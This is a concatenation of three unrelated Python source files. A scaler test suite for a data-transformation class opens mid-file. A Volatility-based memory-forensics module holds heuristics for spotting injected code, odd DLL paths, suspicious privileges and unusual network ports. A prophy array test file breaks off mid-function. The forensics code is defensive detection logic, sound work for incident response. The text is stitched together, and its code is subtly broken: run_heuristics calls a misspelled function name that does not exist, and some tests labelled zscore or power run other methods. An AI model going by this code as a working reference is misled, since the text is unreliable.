data.index = pd.date_range("20110101", periods=len(data), freq="D")
scaler = Transformation(method=method,
**kwargs)
normalized_df, scaler_dict = scaler.fit_transform(data, return_key=True)
denormalized_df = scaler.inverse_transform(data=normalized_df, key=scaler_dict['key'])
return data, normalized_df, denormalized_df
def run_method3(method,
data=None,
index=None,
**kwargs):
if index:
data.index = pd.date_range("20110101", periods=len(data), freq="D")
scaler = Transformation(method=method,
**kwargs)
normalized_df3, scaler_dict = scaler(data,
return_key=True)
denormalized_df3 = scaler(what='inverse', data=normalized_df3, key=scaler_dict['key'])
return data, normalized_df3, denormalized_df3
def run_method4(method,data=None, **kwargs):
scaler = Transformation(**kwargs)
normalized_df4, scaler_dict = getattr(scaler, "fit_transform_with_" + method)(
data=data,
return_key=True)
denormalized_df4 = getattr(scaler, "inverse_transform_with_" + method)(data=normalized_df4, key=scaler_dict['key'])
return normalized_df4, denormalized_df4
def run_log_methods(method="log", index=None, insert_nans=True, insert_zeros=False, assert_equality=True,
insert_ones=False):
a = np.random.random((10, 4))
a[0, 0] = np.nan
a[0, 1] = 1.
if insert_nans or insert_zeros:
a[2:4, 1] = np.nan
a[3:5, 2:3] = np.nan
if insert_zeros:
a[5:8, 3] = 0.0
if insert_ones:
a[6, 1] = 1.0
a[9, 2:3] = 1.0
cols = ['data1', 'data2', 'data3', 'data4']
if index is not None:
index = pd.date_range("20110101", periods=len(a), freq="D")
df3 = pd.DataFrame(a, columns=cols, index=index)
_, _ = run_method1(method=method, data=df3.copy())
_, _, dfo2 = run_method2(method=method, data=df3.copy())
_, _, dfo3 = run_method3(method=method, data=df3.copy())
_, dfo4 = run_method4(method=method, data=df3.copy())
if assert_equality:
#assert np.allclose(df3, dfo1, equal_nan=True)
assert np.allclose(df3, dfo2, equal_nan=True)
assert np.allclose(df3, dfo3, equal_nan=True)
assert np.allclose(df3, dfo4, equal_nan=True)
return
class test_Scalers(unittest.TestCase):
def run_method(self, method, cols=None, index=None, assert_equality=False, **kwargs):
cols = ['data1', 'data2'] if cols is None else cols
normalized_df1, denormalized_df1 = run_method1(method, cols, data=df.copy())
orig_data2, normalized_df2, denormalized_df2 = run_method2(method,
index=index,
features=cols,
data=df.copy(),
**kwargs
)
orig_data3, normalized_df3, denormalized_df3 = run_method3(method, index=index,
data=df.copy(),
**kwargs)
normalized_df4, denormalized_df4 = run_method4(method, data=df.copy(),
**kwargs)
if assert_equality:
assert np.allclose(orig_data2, denormalized_df2)
#assert np.allclose(orig_data3, normalized_df3) # todo
if len(cols) < 2:
self.check_features(denormalized_df1)
else:
for i,j,k,l in zip(normalized_df1[cols].values, normalized_df2[cols].values, normalized_df3[cols].values, normalized_df4[cols].values):
for x in [0, 1]:
self.assertEqual(int(i[x]), int(j[x]))
self.assertEqual(int(j[x]), int(k[x]))
self.assertEqual(int(k[x]), int(l[x]))
for a,i,j,k,l in zip(df.values, denormalized_df1[cols].values, denormalized_df2[cols].values, denormalized_df3[cols].values, denormalized_df4[cols].values):
for x in [0, 1]:
self.assertEqual(int(round(a[x])), int(round(j[x])))
self.assertEqual(int(round(i[x])), int(round(j[x])))
self.assertEqual(int(round(j[x])), int(round(k[x])))
self.assertEqual(int(round(k[x])), int(round(l[x])))
def check_features(self, denorm):
for idx, v in enumerate(denorm['data2']):
self.assertEqual(v, 1001 + idx)
def test_get_scaler_from_dict_error(self):
normalized_df1, _ = Transformation()(df, 'fit_transform', return_key=True)
self.assertRaises(ValueError, Transformation(), what='inverse', data=normalized_df1)
return
def test_log_scaler_with_feat(self):
self.run_method("log", cols=["data1"])
return
def test_robust_scaler_with_feat(self):
self.run_method("robust", cols=["data1"], assert_equality=True)
return
def test_minmax_scaler_with_feat(self):
self.run_method("minmax", cols=["data1"], assert_equality=True)
return
def test_minmax_scaler_with_feat_and_index(self):
self.run_method("minmax", cols=["data1"], index=True, assert_equality=True)
def test_maxabs_scaler_with_feat(self):
self.run_method("maxabs", cols=["data1"], assert_equality=True)
def test_zscore_scaler_with_feat(self):
self.run_method("minmax", cols=["data1"], assert_equality=True)
def test_power_scaler_with_feat(self):
self.run_method("maxabs", cols=["data1"], assert_equality=True)
def test_quantile_scaler_with_feat(self):
self.run_method("quantile", cols=["data1"], assert_equality=True, n_quantiles=5)
def test_log_scaler(self):
self.run_method("log", assert_equality=True)
def test_log10_scaler(self):
self.run_method("log10", assert_equality=True)
return
def test_log2_scaler(self):
self.run_method("log2", assert_equality=True)
return
def test_robust_scaler(self):
self.run_method("robust", assert_equality=True)
return
def test_minmax_scaler(self):
self.run_method("minmax", assert_equality=True)
return
def test_maxabs_scaler(self):
self.run_method("maxabs", assert_equality=True)
def test_zscore_scaler(self):
self.run_method("minmax", assert_equality=True)
def test_power_scaler(self):
self.run_method("maxabs", assert_equality=True)
def test_quantile_scaler(self):
self.run_method("quantile", assert_equality=True, n_quantiles=5)
return
def test_log_with_nans(self):
run_log_methods(index=None)
return
def test_log_with_index(self):
run_log_methods("log", True)
return
def test_log10_with_nans(self):
run_log_methods(method='log10', index=None)
return
def test_log10_with_index(self):
run_log_methods("log10", True)
return
def test_log2_with_nans(self):
run_log_methods(method='log2', index=None)
return
def test_log2_with_index(self):
run_log_methods("log2", True)
return
def test_tan_with_nans(self):
run_log_methods("tan", index=None, assert_equality=False)
return
def test_tan_with_index(self):
run_log_methods("tan", True, assert_equality=False)
return
def test_cumsum_with_index(self):
run_log_methods("cumsum", True, insert_nans=False, assert_equality=False)
return
def test_cumsum_with_nan(self):
run_log_methods("cumsum", True, insert_nans=True, assert_equality=False)
return
def test_zero_log(self):
run_log_methods("log", True, insert_nans=True, insert_zeros=True)
return
def test_zero_one_log(self):
run_log_methods("log", True, insert_nans=True, insert_zeros=True, insert_ones=True)
return
def test_zero_log10(self):
run_log_methods("log10", True, insert_nans=True, insert_zeros=True)
return
def test_zero_one_log10(self):
run_log_methods("log10", True, insert_nans=True, insert_zeros=True, insert_ones=True)
return
def test_zero_log2(self):
run_log_methods("log2", True, insert_nans=True, insert_zeros=True)
return
def test_zero_one_log2(self):
run_log_methods("log2", True, insert_nans=True, insert_zeros=True, insert_ones=True)
return
def test_multiple_transformations(self):
"""Test when we want to apply multiple transformations on one or more features"""
inputs = ['in1', 'inp1']
outputs = ['out1']
data = pd.DataFrame(np.random.random((100, 3)), columns=inputs+outputs)
x_transformation = "minmax"
y_transformation = ["log", "minmax"]
pred = build_and_run(x_transformation, y_transformation, data, inputs, outputs)
for i in pred.index:
assert np.allclose(data['out1'].loc[i], pred['out1'].loc[i])
return
def test_multiple_same_transformations(self):
"""Test when we want to apply multiple transformations on one or more features"""
inputs = ['in1', 'inp1']
outputs = ['out1']
data = pd.DataFrame(np.random.random((100, 3)), columns=inputs+outputs)
x_transformation = "robust"
y_transformation = ["robust", "robust"]
pred = build_and_run(x_transformation, y_transformation, data, inputs,outputs)
for i in pred.index:
assert np.allclose(data['out1'].loc[i], pred['out1'].loc[i])
return
    def test_multiple_same_transformations_multiple_outputs(self):
"""Test when we want to apply multiple transformations on one or more features"""
inputs = ['in1', 'inp1']
outputs = ['out1', 'out2']
data = pd.DataFrame(np.random.random((100, 4)), columns=inputs+outputs)
x_transformation = "robust"
y_transformation = ["robust", "robust"]
pred = build_and_run(x_transformation, y_transformation, data, inputs,outputs)
for i in pred.index:
assert np.allclose(data['out1'].loc[i], pred['out1'].loc[i])
assert np.allclose(data['out2'].loc[i], pred['out2'].loc[i])
return
def test_example(self):
data = busan_beach()
inputs = ['pcp6_mm', 'pcp12_mm', 'wind_dir_deg', 'wind_speed_mps', 'air_p_hpa']
transformer = Transformation(method='minmax', features=['pcp6_mm', 'pcp12_mm'])
new_data = transformer.fit_transform(data[inputs])
orig_data = transformer.inverse_transform(data=new_data)
np.allclose(data[inputs].values, orig_data.values)
return
def test_negative(self):
for m in ["log", "log2", "log10", "minmax", "zscore", "robust", "quantile", "power",
"scale", "center", "sqrt", "yeo-johnson", "box-cox"]:
kwargs = {}
if m=="quantile":
kwargs['n_quantiles'] = 2
x = [1.0, 2.0, -3.0, 4.0]
tr = Transformation(method=m, treat_negatives=True, **kwargs)
xtr = tr.fit_transform(x)
_x = tr.inverse_transform(data=xtr)
np.testing.assert_array_almost_equal(x, _x.values.reshape(-1,))
for m in ["log", "log2", "log10", "minmax", "zscore", "robust", "quantile", "power",
"scale", "center", "sqrt", "yeo-johnson",
"box-cox"]:
kwargs = {}
if m=="quantile":
kwargs['n_quantiles'] = 2
x1 = [1.0, -2.0, 0.0, 4.0]
df1 = pd.DataFrame(np.column_stack([x, x1]))
tr = Transformation(method=m, treat_negatives=True, replace_zeros=True,
replace_zeros_with=1, **kwargs)
dft = tr.fit_transform(df1)
_df = tr.inverse_transform(data=dft)
np.testing.assert_array_almost_equal(df1.values, _df.values)
return
def test_boxcox(self):
t = Transformation("box-cox")
x1 = t.fit_transform([1,2,3])
from sklearn.preprocessing import PowerTransformer
x2 = PowerTransformer('box-cox').fit_transform(np.array([1,2,3]).reshape(-1,1))
np.testing.assert_array_almost_equal(x1, x2)
return
def test_yeojohnson(self):
t = Transformation("yeo-johnson")
x1 = t.fit_transform([1,2,3])
from sklearn.preprocessing import PowerTransformer
x2 = PowerTransformer().fit_transform(np.array([1,2,3]).reshape(-1,1))
np.testing.assert_array_almost_equal(x1, x2)
return
def test_center(self):
run_log_methods("center")
return
def test_scale(self):
run_log_methods('scale')
return
def test_from_config_1d(self):
for method in ["quantile", "robust",
"power", "box-cox", "center", "zscore", "scale"
]:
kwargs = {}
if method=="quantile":
kwargs['n_quantiles'] = 5
t = Transformation(method, treat_negatives=True, replace_zeros=True, **kwargs)
x = [1., 2., 3., 0.0, -5., 6.]
x1 = t.fit_transform(data=x)
conf = t.config()
t2 = Transformation.from_config(conf)
x2 = t2.inverse_transform(data=x1)
np.testing.assert_array_almost_equal(np.array(x), x2.values.reshape(-1,))
return
def test_from_config_2d(self):
for method in ["quantile", "robust",
"power", "box-cox", "center", "zscore", "scale"
]:
kwargs = {}
if method=="quantile":
kwargs['n_quantiles'] = 5
t = Transformation(method, features=['a', 'b'],
treat_negatives=True, replace_zeros=True, **kwargs)
x = np.random.randint(-2, 30, (10, 3))
data = pd.DataFrame(x, columns=['a', 'b', 'c'])
x1 = t.fit_transform(data=data.copy())
conf = t.config()
t2 = Transformation.from_config(conf)
x2 = t2.inverse_transform(data=x1)
np.testing.assert_array_almost_equal(x, x2.values)
return
if __name__ == "__main__":
unittest.main()
|
486625
|
import json
import logging
import os
import re
import pefile
from pefile import PEFormatError
from conf.config import EXPLOITABLE_PROCESS_NAMES
from conf.static_config import DLLS_IN_SYSDIR
from lib.common.pslist import get_new_pslist
from lib.common.utils import create_workdir
from lib.core.memory_utils import execute_volatility_command, dump_process, dump_dll
from lib.common.pe_utils import fix_pe_from_memory, static_analysis, get_strings
from lib.core.sample import SampleDump
# TODO: Heuristic for drivers of uncommon path or size
# ldrmodules anomalies
#
def run_heuristics(memory_instance, workdir=None, dump_objects=False):
"""
Execute all required heuristics
:param memory_instance: an instance of memory object
:param workdir: path to the workdir
    :param dump_objects: whether to dump suspicious results or not
:return: dictionary containing all heuristics results
"""
pslist = get_new_pslist(memory_instance)
suspicious_drivers_by_ssdt = heuristic_ssdt(memory_instance, pslist=pslist, workdir=workdir,dump_objects=dump_objects)
suspicious_procs_by_dst_port = heuristic_dest_port_anomallies(memory_instance, pslist=pslist, workdir=workdir,
dump_objects=dump_objects)
suspicious_loaded_dlls_by_count = heuristic_dll_uncommon_on_machine(memory_instance, pslist=pslist, workdir=workdir,
dump_objects=dump_objects)
suspicious_processes_by_sids = heuristic_by_process_sids(memory_instance, pslist=pslist, workdir=workdir,
dump_objects=dump_objects)
injected_code = heuristic_injected_code(memory_instance, pslist=pslist, workdir=workdir, dump_objects=dump_objects)
suspect_processes = heuristic_exploitable_parent(memory_instance, workdir=workdir, dump_objects=dump_objects)
suspicious_dlls = heuristic_libraries_by_path(memory_instance, pslist=pslist, workdir=workdir,
dump_objects=dump_objects)
suspicious_procs_by_privs = heuristics_process_privileges(memory_instance, pslist=pslist, workdir=workdir,
dump_objects=dump_objects)
suspicious_handles = heuristic_suspicious_handles(memory_instance, pslist=pslist, workdir=workdir,
dump_objects=dump_objects)
result = {'pslist': pslist, 'injected_code': injected_code, 'suspicious_processes_by_handles': suspect_processes,
'suspicious_handles': suspicious_handles, 'suspicious_dlls': suspicious_dlls,
'suspect_processes_by_priv': suspicious_procs_by_privs,
'suspicious_procs_by_dst_port': suspicious_procs_by_dst_port,
'suspicious_loaded_dlls_by_count': suspicious_loaded_dlls_by_count,
'suspicious_processes_by_sids': suspicious_processes_by_sids,
'suspicious_drivers_by_ssdt': suspicious_drivers_by_ssdt}
return result
def heuristic_exploitable_parent(memory_instance, pslist=None, workdir=None, dump_objects=False):
"""
Dump executable processes according to parent process name
:param memory_instance: an instance of memory object
:param pslist: list of processes obtained from get_new_pslist
:param workdir: path to the workdir
:param dump_objects: whether to dump suspicious results or not
:return:
"""
# Get process list
if pslist is None:
pslist = get_new_pslist(memory_instance)
suspect_processes = []
for process in pslist:
if process['Name'].lower() in EXPLOITABLE_PROCESS_NAMES:
logging.info('Checking child of exploitable process {}'.format(process['Name']))
for child_process in pslist:
if child_process['PPID'] == process['PID']:
if child_process['Name'] != process['Name']:
logging.info('Found potentially exploit payload: {}'.format(child_process))
suspect_processes.append(child_process)
if dump_objects:
logging.info('Dumping {} due to suspicious exploitable parent'.format(child_process))
dump_process(memory_instance, child_process['PID'], workdir,
process_name=child_process['Name'],
memdump=True)
return suspect_processes
def heuristic_by_process_sids(memory_instance, pslist=None, workdir=None, dump_objects=False):
"""
Dump suspicious processes, according to running user
:param memory_instance: an instance of memory object
:param pslist: list of processes obtained from get_new_pslist
:param workdir: path to the workdir
:param dump_objects: whether to dump suspicious results or not
:return: dictionary of suspect code injection sections inside processes
"""
process_whitelist = ['System', 'msiexec.exe', 'VMwareService.e', 'spoolsv.exe', 'svchost.exe', 'vmacthlp.exe',
'services.exe', 'winlogon.exe', 'csrss.exe', 'smss.exe', 'lsass.exe','vmtoolsd.exe']
suspicious_processes = list()
# Get process list
if pslist is None:
pslist = get_new_pslist(memory_instance)
if workdir is None:
workdir = create_workdir()
# "columns": ["PID", "Process", "SID", "Name"]}
output = execute_volatility_command(memory_instance, 'getsids')
for priv in output:
if priv['SID'] == 'S-1-5-18' and priv['Process'] not in process_whitelist:
logging.info('Suspicious priv: {}'.format(priv))
suspicious_processes.append(priv)
if dump_objects:
logging.info('Dumping {} due to suspicious SID'.format(priv['PID']))
dump_process(memory_instance, priv['PID'], workdir,
process_name=priv['Process'],
memdump=True)
return suspicious_processes
def heuristic_injected_code(memory_instance, pslist=None, workdir=None, dump_objects=False, delete_non_pe=False):
"""
Dump injected code
:param memory_instance: an instance of memory object
:param pslist: list of processes obtained from get_new_pslist
:param workdir: path to the workdir
:param dump_objects: whether to dump suspicious results or not
:param delete_non_pe: delete non PE files or not, they could be shellcode injections
:return: dictionary of suspect code injection sections inside processes
"""
# Get process list
if pslist is None:
pslist = get_new_pslist(memory_instance)
if workdir is None:
workdir = create_workdir()
injected_dumps_list = list()
if dump_objects:
logging.info('Going to dump injected processes to {}'.format(workdir))
output = execute_volatility_command(memory_instance, 'malfind', extra_flags='-D {}/'.format(workdir),
has_json_output=False)
# Find malfind injections that are binaries, and rename them
for single_dump in os.scandir(workdir):
splitted_line = single_dump.path.strip().split('.')
if len(splitted_line) == 4:
offset = splitted_line[1]
imagebase = splitted_line[2]
try:
pe = pefile.PE(single_dump.path)
fixed_pe = fix_pe_from_memory(pe, imagebase=imagebase)
# Get original process name
procname = "unknown"
for process in pslist:
if str(process['Offset(V)']) == str(int(offset, 16)):
logging.info("Found process name: {}".format(process['Name']))
procname = process['Name']
pid = str(process['PID'])
break
outputpath = os.path.join(workdir, procname + '.' + offset + '.' + imagebase + '.fixed_bin')
logging.info('Dumping fixed PE to {}'.format(outputpath))
fixed_pe.write(filename=outputpath)
pe.close()
if procname != 'unknown':
injected_dumps_list.append({'path': outputpath, 'process_name': procname, 'pid': pid})
else:
injected_dumps_list.append(outputpath)
current_dump = SampleDump(outputpath)
with open(outputpath + '.strings.json', 'w') as strings_output_file:
strings_output_file.write(json.dumps(get_strings(current_dump), indent=4))
with open(outputpath + '.static_analysis.json', 'w') as strings_output_file:
strings_output_file.write(json.dumps(static_analysis(current_dump), indent=4))
except PEFormatError:
logging.info('Corrupted, or not PE file...')
if delete_non_pe:
os.remove(single_dump)
pass
result = {'PE_dump_list': injected_dumps_list}
else:
logging.info('No output workdir defined, not going to dump injected processes.')
output = execute_volatility_command(memory_instance, 'malfind')
result = {'malfind_output': output}
return result
def heuristic_libraries_by_path(memory_instance, pslist=None, workdir=None, dump_objects=False):
"""
Heuristics by path, using statistics and dlllist
:param memory_instance: memory instance object
:param pslist: list of loaded processes created by get_new_pslist()
:param workdir: path to working directory
:param dump_objects: whether to dump suspicious objects or not
:return: dictionary of suspect processes
"""
loaded_dlls = execute_volatility_command(memory_instance, 'dlllist')
statistic_dict = dict()
suspicious_dlls = list()
max_files_threshold = 2
statistic_anomalies_list = ['\\systemroot\\system32\\smss.exe', 'c:\\windows\\explorer.exe',
'c:\\program files\\internet explorer\\ieproxy.dll']
for loaded_dll in loaded_dlls:
# loaded_dll['Path'].lower()
folder_path = '\\'.join(loaded_dll['Path'].lower().split('\\')[0:-1])
try:
statistic_dict[folder_path] += 1
except KeyError:
statistic_dict[folder_path] = 1
suspect_path_list = list()
sorted_dict = sorted(statistic_dict.items(), key=lambda x: x[1], reverse=True)
for path in sorted_dict:
if path[1] < max_files_threshold:
print(path)
suspect_path_list.append(path[0])
for loaded_dll in loaded_dlls:
for suspect_path in suspect_path_list:
if '\\'.join(loaded_dll['Path'].lower().split('\\')[0:-1]) == suspect_path.lower():
if loaded_dll['Path'].lower() not in statistic_anomalies_list:
suspicious_dlls.append(loaded_dll)
if dump_objects:
logging.info('Going to dump {} due to suspicious path'.format(loaded_dll))
dump_dll(memory_instance, loaded_dll['Pid'], loaded_dll['Base'], workdir)
return suspicious_dlls
def heuristic_suspicious_handles(memory_instance, pslist=None, workdir=None, dump_objects=False):
"""
Heuristics by suspicious handles
:param memory_instance: memory instance object
:param pslist: list of loaded processes created by get_new_pslist()
:param workdir: path to working directory
:param dump_objects: whether to dump suspicious objects or not
:return: dictionary of suspect processes
"""
handles_list = execute_volatility_command(memory_instance, 'handles', extra_flags='-s')
supported_handles = ['Key', 'File', 'Mutant', 'Thread']
# Initiate a dict with scoring per PID...
process_scoring = dict()
for process in pslist:
process_scoring[process['PID']] = {'Name': process['Name'], 'PID': process['PID'], 'PPID': process['PPID'],
'susp_keys': 0,
'susp_files': 0,
'susp_mutex': 0,
'susp_thread_handles': 0,
'Key': list(), 'File': list(), 'Mutant': list(),
'Thread': list()}
# for each process, add its handles to his dict
for handle in handles_list:
if handle['Type'] in supported_handles:
try:
process_scoring[handle['Pid']][handle['Type']].append(handle)
except KeyError:
logging.info('PID does not exist ({})'.format(handle['Pid']))
# Get a dictionary of running processes by name, for easier iteration (from pslist)
running_processes = dict()
for running_process in pslist:
running_processes[str(running_process['PID'])] = running_process['Name']
# Anomaly detection phase:
# Find processes with handles to threads in other processes...
for process_pid in process_scoring:
for thread_handle in process_scoring[process_pid]['Thread']:
# Get pid from regex:
m = re.search(r'^TID (\d{2,4})\sPID\s(\d{2,4})$', thread_handle['Details'])
if m:
tid = m.group(1)
pid = m.group(2)
if pid != str(process_pid) and pid != str(process_scoring[process_pid]['PPID']) and \
process_scoring[process_pid]['Name'] != 'csrss.exe':
try:
if process_scoring[process_pid]['Name'] == 'services.exe' and running_processes[
pid] == 'lsass.exe':
continue
if process_scoring[process_pid]['Name'] == 'lsass.exe' and running_processes[
pid] == 'svchost.exe':
continue
logging.info(
'This process has a handle to a thread in another process: {}-{} ---> {} ({})'.format(
process_scoring[process_pid]['Name'], process_pid, thread_handle['Details'],
running_processes[pid]))
except KeyError:
logging.info('This process has a handle to a thread in another process: {}-{} ---> {}'.format(
process_scoring[process_pid]['Name'], process_pid, thread_handle['Details']))
process_scoring[process_pid]['susp_thread_handles'] += 1
# Mutants (i.e statistically outstanding mutants)
# TODO: import fuzzywuzzy, from fuzzywuzzy import fuzz, fuzz.ratio(a,b)
# Files (i.e executables/DLLs from unusual paths)
# Keys (i.e persistency keys...)
# Create a final list of processes with more suspicious handles than the threshold:
threshold = 0
suspect_processes = list()
for process_pid in process_scoring:
if (process_scoring[process_pid]['susp_keys'] + process_scoring[process_pid]['susp_files'] +
process_scoring[process_pid]['susp_mutex'] + process_scoring[process_pid][
'susp_thread_handles']) > threshold:
suspect_processes.append({'pid': process_pid, 'name': process_scoring[process_pid]['Name'],
'susp_keys': process_scoring[process_pid]['susp_keys'],
'susp_files': process_scoring[process_pid]['susp_files'],
'susp_mutex': process_scoring[process_pid]['susp_mutex'],
'susp_thread_handles': process_scoring[process_pid]['susp_thread_handles']})
return suspect_processes
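# Illustrative helper (added for clarity, never called by the heuristics themselves): shows
# what the 'Details' regex above extracts from a typical thread handle reported by the
# volatility 'handles' plugin. The sample string in the docstring is an assumption about
# that plugin's output format.
def _parse_thread_handle_details(details):
    """Return (tid, pid) parsed from a string such as 'TID 1234 PID 5678', or None."""
    m = re.search(r'^TID (\d{2,4})\sPID\s(\d{2,4})$', details)
    return (m.group(1), m.group(2)) if m else None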
def heuristics_process_privileges(memory_instance, pslist=None, workdir=None, dump_objects=False):
"""
Find suspicious processes according to process privileges
:param memory_instance: memory instance object
:param pslist: list of loaded processes created by get_new_pslist()
:param workdir: path to working directory
:param dump_objects: whether to dump suspicious objects or not
:return: dictionary of suspect processes
"""
suspicious_privileges = ['SeDebugPrivilege', 'SeTcbPrivilege',
'SeTrustedCredManAccessPrivilege']
privs_list = execute_volatility_command(memory_instance, 'privs')
procs_with_suspicious_privs = list()
dumped_process_list = list()
for privilege in privs_list:
if privilege['Privilege'] in suspicious_privileges:
attributes_list = privilege['Attributes'].split(',')
if 'Present' in attributes_list and 'Enabled' in attributes_list and 'Default' not in attributes_list:
print(json.dumps(privilege))
procs_with_suspicious_privs.append(privilege)
if dump_objects and privilege['Pid'] not in dumped_process_list:
logging.info('Dumping {} due to suspicious privileges'.format(privilege['Pid']))
dump_process(memory_instance, privilege['Pid'], workdir, process_name=privilege['Process'])
dumped_process_list.append(privilege['Pid'])
return procs_with_suspicious_privs
def heuristic_dest_port_anomalies(memory_instance, pslist=None, workdir=None, dump_objects=False):
whitelisted_dest_ports = ['80', '443', '8443', '53', '3889']
suspicious_processes = list()
connections = execute_volatility_command(memory_instance, 'connections')
for conn in connections:
dst_ip, dst_port = conn['RemoteAddress'].split(':')
if dst_port not in whitelisted_dest_ports:
suspicious_processes.append(conn)
if dump_objects:
procname = 'unknown'
for process in pslist:
if str(process['Offset(V)']) == str(conn['Offset(V)']):
logging.info("Found process name: {}".format(process['Name']))
procname = process['Name']
pid = str(process['PID'])
break
dump_process(memory_instance, conn['PID'], workdir, process_name=procname)
return suspicious_processes
def heuristic_dest_ip_malicious_in_vt(memory_instance, pslist=None, workdir=None, dump_objects=False):
pass
def heuristic_dll_uncommon_on_machine(memory_instance, pslist=None, workdir=None, dump_objects=False):
loaded_dlls = execute_volatility_command(memory_instance, 'dlllist')
suspect_path_list = list()
loaded_dlls_counter = dict()
for loaded_dll in loaded_dlls:
try:
loaded_dlls_counter[loaded_dll['Path']]['counter'] += 1
except KeyError:
loaded_dlls_counter[loaded_dll['Path']] = {'counter': 0, 'first_seen': loaded_dll}
for key in loaded_dlls_counter:
if loaded_dlls_counter[key]['first_seen']['Path'] not in DLLS_IN_SYSDIR:
if loaded_dlls_counter[key]['counter'] == 1 and loaded_dlls_counter[key]['first_seen']['LoadCount'] == 1:
print('Going to dump: {}'.format(loaded_dlls_counter[key]['first_seen']))
if dump_objects:
dump_dll(memory_instance, loaded_dlls_counter[key]['first_seen']['Pid'],
loaded_dlls_counter[key]['first_seen']['Base'], workdir)
suspect_path_list.append(loaded_dlls_counter[key]['first_seen'])
return suspect_path_list
def heuristic_ssdt(memory_instance, pslist=None, workdir=None, dump_objects=False):
ssdt = execute_volatility_command(memory_instance, 'ssdt')
legitimate_owners = ['ntoskrnl.exe', 'win32k.sys']
known_owners = list()
for entry in ssdt:
if entry['Owner'] not in legitimate_owners and entry['Owner'] not in known_owners:
print('New owner: {}'.format(entry))
known_owners.append(entry['Owner'])
for driver_name in known_owners:
# /usr/local/bin/vol.py --profile WinXPSP2x86 -f "/home/MemoryDumps/APT.img" moddump -r irykmmww.sys -D /tmp
execute_volatility_command(memory_instance,'moddump',extra_flags='-r {} -D {}'.format(driver_name,workdir))
return known_owners
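# A minimal usage sketch (hypothetical; the function and file names below are invented,
# and constructing the memory object depends on lib.core.memory_utils, which is outside
# this module): run every heuristic against an already-loaded memory image and persist
# the combined summary next to the dumps.
def _example_run_all_heuristics(memory_instance, workdir=None):
    if workdir is None:
        workdir = create_workdir()
    results = run_heuristics(memory_instance, workdir=workdir, dump_objects=True)
    with open(os.path.join(workdir, 'heuristics_summary.json'), 'w') as summary_file:
        summary_file.write(json.dumps(results, indent=4, default=str))
    return results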
|
486629
|
import pytest
import prophy
@pytest.fixture(scope='session')
def X():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("x", prophy.u32)]
return X
@pytest.fixture(scope='session')
def FixedScalarArray():
class FixedScalarArray(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("value", prophy.array(prophy.u32, size=2))]
return FixedScalarArray
@pytest.fixture(scope='session')
def FixedCompositeArray(X):
class FixedCompositeArray(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("value", prophy.array(X, size=2))]
return FixedCompositeArray
def test_base_array_operators():
class X(prophy.with_metaclass(prophy.struct_generator, prophy.struct)):
_descriptor = [('values', prophy.array(prophy.i16, size=4))]
x = X()
x.values[0] = 123
x.values[2] = 4
x.values[3] = -1
with pytest.raises(TypeError, match="unhashable (:?object|type: '_array')"):
set([x.values])
assert len(x.values) == 4
assert repr(x.values) == '[123, 0, 4, -1]'
x.values.sort()
assert x.values == [-1, 0, 4, 123]
def test_fixed_scalar_array_assignment(FixedScalarArray):
x = FixedScalarArray()
assert x.value[:] == [0, 0]
x.value[0] = 1
x.value[1] = 2
assert x.value[:] == [1, 2]
x.value[:] = [6, 7]
assert x.value[:] == [6, 7]
x.value[slice(0, 2)] = [6, 7]
assert x.value[:] == [6, 7]
with pytest.raises(Exception, match="(:?__delitem__|'_array' object does not support item deletion)"):
del x.value[0]
with pytest.raises(Exception, match="'_array' object has no attribute 'no_such_attribute'"):
x.value.no_such_attribute
with pytest.raises(Exception, match="'_array' object has no attribute 'no_such_attribute'"):
x.value.no_such_attribute = 10
with pytest.raises(Exception, match="assignment to array field not allowed"):
x.value = 10
with pytest.raises(Exception, match=r"(:?object of type |)'int' has no (:?len\(\)|length)"):
x.value[:] = 10
with pytest.raises(Exception, match="setting slice with different length collection"):
x.value[:] = (10,)
with pytest.raises(Exception, match="not an int"):
x.value[0] = "will fail type check"
with pytest.raises(Exception, match=r"value: -1 out of 4B integer's bounds: \[0, 4294967295\]"):
x.value[0] = -1
y = FixedScalarArray()
y.value[:] = [1, 2]
y.copy_from(x)
assert y.value[:] == [6, 7]
def test_fixed_scalar_array_operators(FixedScalarArray):
x = FixedScalarArray()
y = FixedScalarArray()
assert x.value == x.value
x.value[0] = 23
assert x.value != y.value
y.value[0] = 23
assert x.value == y.value
def test_fixed_scalar_array_print(FixedScalarArray):
x = FixedScalarArray()
x.value[:] = [1, 2]
assert str(x) == ("value: 1\n"
"value: 2\n")
def test_fixed_scalar_array_encode(FixedScalarArray):
x = FixedScalarArray()
x.value[:] = [1, 2]
assert x.encode(">") == b"\x00\x00\x00\x01\x00\x00\x00\x02"
def test_fixed_scalar_array_decode(FixedScalarArray):
x = FixedScalarArray()
x.decode(b"\x00\x00\x00\x01\x00\x00\x00\x02", ">")
assert x.value[:] == [1, 2]
def test_fixed_scalar_array_exception():
class D(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("a_len", prophy.u8),
("a", prophy.array(prophy.u8, bound="a_len"))]
class U(prophy.with_metaclass(prophy.struct_generator, prophy.struct_packed)):
_descriptor = [("a", prophy.array(prophy.u8))]
with pytest.raises(Exception, match="static/limited array of dynamic type not allowed"):
prophy.array(D, size=2)
with pytest.raises(Exception, match="static/limited array of dynamic type not allowed"):
prophy.array(U, size=2)
with pytest.raises(Exception, match="static/limited array of dynamic type not allowed"):
prophy.array(D, bound="a_len", size=2)
with pytest.raises(Exception, match="static/limited array of dynamic type not allowed"):
prophy.array(U, bound="a_len", size=2)
def test_fixed_composite_array_assignment(FixedCompositeArray):
x = FixedCompositeArray()
assert len(x.value) == 2
assert x.value[0].x == 0
assert x.value[1].x == 0
x.value[0].x = 1
assert x.value[0].x == 1
x.value[1].x = 2
assert x.value[1].x == 2
y = FixedCompositeArray()
y.value[0].x = 10
y.value[1].x = 11
y.copy_from(x)
assert y.value[0].x == 1
assert y.value[1].x == 2
assert x.value == x.value
def test_fixed_composite_array_print(FixedCompositeArray):
x = FixedCompositeArray()
x.value[0].x = 1
x.value[1].x = 2
assert str(x) == ("value {\n"
" x: 1\n"
"}\n"
"value {\n"
" x: 2\n"
"}\n")
def test_fixed_composite_array_encode(FixedCompositeArray):
x = FixedCompositeArray()
x.value[0].x = 1
x.value[1].x = 2
assert x.encode(">") == b"\x00\x00\x00\x01\x00\x00\x00\x02"
def test_fixed_composite_array_decode(FixedCompositeArray):
x = FixedCompositeArray()
